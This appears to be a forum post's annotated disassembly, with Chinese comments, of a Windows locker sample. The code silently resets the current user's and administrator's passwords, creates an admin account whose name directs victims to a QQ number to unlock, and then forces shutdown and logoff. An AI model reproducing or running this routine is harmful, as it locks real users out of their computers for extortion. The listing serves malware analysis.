[Asm] 纯文本查看 复制代码
; =============== S U B R O U T I N E =======================================
.data:00401100
.data:00401100 ; Attributes: bp-based frame
.data:00401100
.data:00401100 public start
.data:00401100 start proc near
.data:00401100
.data:00401100 var_1104 = byte ptr -1104h
.data:00401100 var_1103 = byte ptr -1103h
.data:00401100 var_D04 = byte ptr -0D04h
.data:00401100 var_D03 = byte ptr -0D03h
.data:00401100 var_904 = byte ptr -904h
.data:00401100 var_903 = byte ptr -903h
.data:00401100 CmdLine = byte ptr -504h
.data:00401100 var_503 = byte ptr -503h
.data:00401100 Buffer = byte ptr -104h
.data:00401100 var_103 = byte ptr -103h
.data:00401100 pcbBuffer = dword ptr -4
.data:00401100
.data:00401100 push ebp
.data:00401101 mov ebp, esp
.data:00401103 mov eax, 1104h
.data:00401108 call __alloca_probe ; 堆栈空间分配函数
.data:0040110D and [ebp+Buffer], 0
.data:00401114 push ebx
.data:00401115 push esi
.data:00401116 push edi
.data:00401117 push 3Fh
.data:00401119 xor eax, eax
.data:0040111B pop ecx
.data:0040111C lea edi, [ebp+var_103]
.data:00401122 rep stosd
.data:00401124 stosw
.data:00401126 stosb
.data:00401127 lea eax, [ebp+pcbBuffer]
.data:0040112A mov [ebp+pcbBuffer], 100h
.data:00401131 push eax ; pcbBuffer 传入的缓冲区宽度
.data:00401132 lea eax, [ebp+Buffer]
.data:00401138 push eax ; lpBuffer 传入的缓冲区指针
.data:00401139 call GetUserNameA ; 获取当前用户名
.data:0040113F and [ebp+CmdLine], 0
.data:00401146 mov ecx, 0FFh
.data:0040114B xor eax, eax
.data:0040114D lea edi, [ebp+var_503]
.data:00401153 rep stosd
.data:00401155 stosw
.data:00401157 mov ebx, wsprintfA ; 将字符串或数值输入到缓冲区
.data:0040115D push offset a107289 ; "107289"
.data:00401162 stosb
.data:00401163 lea eax, [ebp+Buffer] ; 当前用户名
.data:00401169 push eax
.data:0040116A push offset aNetUser ; "net user"
.data:0040116F lea eax, [ebp+CmdLine]
.data:00401175 push offset aSSS ; 输入格式'%s %s %s'
.data:0040117A push eax ; LPSTR 输入缓冲区
.data:0040117B call ebx ; wsprintfA ; wsprintf($CmdLine,"%s %s %s","net user",当前用户名,"107289")
.data:0040117B ; 字符串作用,为当前用户添加登录密码107289
.data:0040117D mov esi, WinExec
.data:00401183 add esp, 14h
.data:00401186 lea eax, [ebp+CmdLine]
.data:0040118C push 0 ; uCmdShow 窗口显示方式,0代表隐藏且没有最小化图标的形式
.data:0040118E push eax ; lpCmdLine 指向要执行的命令行字符串
.data:0040118F call esi ; WinExec ; 执行"net user 当前用户名 107289"
.data:00401191 and [ebp+var_D04], 0
.data:00401198 mov ecx, 0FFh
.data:0040119D xor eax, eax
.data:0040119F lea edi, [ebp+var_D03]
.data:004011A5 rep stosd
.data:004011A7 stosw
.data:004011A9 stosb
.data:004011AA push offset a107289 ; "107289"
.data:004011AF push offset aNetUserAdminis ; "net user administrator"
.data:004011B4 lea eax, [ebp+var_D04]
.data:004011BA push offset aSS ; "%s %s"
.data:004011BF push eax ; LPSTR
.data:004011C0 call ebx ; wsprintfA ; wsprintf($var_D04,"%s %s","net user administrator","107289")
.data:004011C0 ; 为administrator账户添加密码107289
.data:004011C2 add esp, 10h
.data:004011C5 lea eax, [ebp+var_D04]
.data:004011CB push 0 ; uCmdShow
.data:004011CD push eax ; lpCmdLine
.data:004011CE call esi ; WinExec ; 执行字符串"net user administrator 107289"
.data:004011D0 and [ebp+var_904], 0
.data:004011D7 mov edx, 0FFh
.data:004011DC mov ecx, edx
.data:004011DE xor eax, eax
.data:004011E0 lea edi, [ebp+var_903]
.data:004011E6 and [ebp+var_1104], 0
.data:004011ED rep stosd
.data:004011EF stosw
.data:004011F1 stosb
.data:004011F2 mov ecx, edx
.data:004011F4 xor eax, eax
.data:004011F6 lea edi, [ebp+var_1103]
.data:004011FC push offset dword_401080 ; "/add"
.data:00401201 rep stosd
.data:00401203 stosw
.data:00401205 stosb
.data:00401206 mov edi, offset loc_401068
.data:0040120B push offset a107289 ; "107289"
.data:00401210 push edi ; "加QQ1072890578解锁"
.data:00401211 push offset aNetUser ; "net user"
.data:00401216 push offset aSSSS ; "%s %s %s %s"
.data:0040121B lea eax, [ebp+var_904]
.data:00401221 push eax ; LPSTR
.data:00401222 call ebx ; wsprintfA ; wsprintf($var_904,"%s %s %s %s","net user","加QQ1072890578解锁","107289","/add")
.data:00401224 push offset dword_401080 ; "/add"
.data:00401229 push edi ; 用户名
.data:0040122A push offset aNetLocalgroupA ; "net localgroup administrators"
.data:0040122F lea eax, [ebp+var_1104]
.data:00401235 push offset aSSS ; "%s %s %s"
.data:0040123A push eax ; LPSTR
.data:0040123B call ebx ; wsprintfA ; wsprintf($var_1104,"%s %s %s","net localgroup administrators","加QQ1072890578解锁","/add")
.data:0040123D add esp, 2Ch
.data:00401240 xor ebx, ebx
.data:00401242 lea eax, [ebp+var_904]
.data:00401248 push ebx ; uCmdShow
.data:00401249 push eax ; lpCmdLine
.data:0040124A call esi ; WinExec ; 执行字符串"net user 加QQ1072890578解锁 107289 /add",创建一个带密码的用户
.data:0040124C mov edi, Sleep
.data:00401252 push 0BB8h ; dwMilliseconds
.data:00401257 call edi ; Sleep
.data:00401259 lea eax, [ebp+var_1104]
.data:0040125F push ebx ; uCmdShow
.data:00401260 push eax ; lpCmdLine
.data:00401261 call esi ; WinExec ; 执行"net localgroup administrators 加QQ1072890578解锁 /add",将新创建的用户添加到管理员,获取管理员权限
.data:00401263 push 1388h ; dwMilliseconds
.data:00401268 call edi ; Sleep
.data:0040126A push ebx ; uCmdShow
.data:0040126B push offset CmdLine ; "shutdown -s -t 0"
.data:00401270 call esi ; WinExec ; 关机
.data:00401272 push ebx ; uCmdShow
.data:00401273 push offset aLogoff ; "logoff"
.data:00401278 call esi ; WinExec ; 注销
.data:0040127A pop edi
.data:0040127B pop esi
.data:0040127C xor eax, eax
.data:0040127E pop ebx
.data:0040127F leave
.data:00401280 retn 10h
.data:00401280 start endp